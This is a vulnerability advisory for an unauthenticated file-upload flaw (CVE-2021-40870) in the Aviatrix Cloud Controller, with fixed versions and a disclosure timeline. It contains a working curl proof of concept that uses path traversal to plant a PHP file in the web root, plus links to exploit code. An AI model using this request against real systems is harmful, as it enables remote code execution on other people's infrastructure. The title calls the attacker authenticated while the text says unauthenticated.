Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code

Overview

While the Aviatrix UI requires authentication, many API calls do not enforce a check for authentication. Some of these API calls allow an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem. These uploaded scripts will be processed by the web frontend, allowing an attacker to run code of their choosing.

Proof of concept

1. Make the following request to the Aviatrix Cloud Controller aviatrix:

curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'

1. Visit https://aviatrix.domain.tld/v1/test. This will show the PHP Version page.

Mitigation/further actions

Upgrade to one of the following versions:

• UserConnect-6.2-1804.2043 or later

• UserConnect-6.3-1804.2490 or later

• UserConnect-6.4-1804.2838 or later

• UserConnect-6.5-1804.1922 or later

Advisory timeline

1. 2021-05-12: Discovered

2. 2021-08-24: Reported to Aviatrix security team

3. 2021-08-26: Aviatrix security team confirm vulnerability will be fixed in forthcoming release

4. 2021-09-11: Fix released

5. 2021-09-12: CVE requested

6. 2021-09-13: CVE allocated

https://github.com/0xAgun/CVE-2021-40870

https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40870.yaml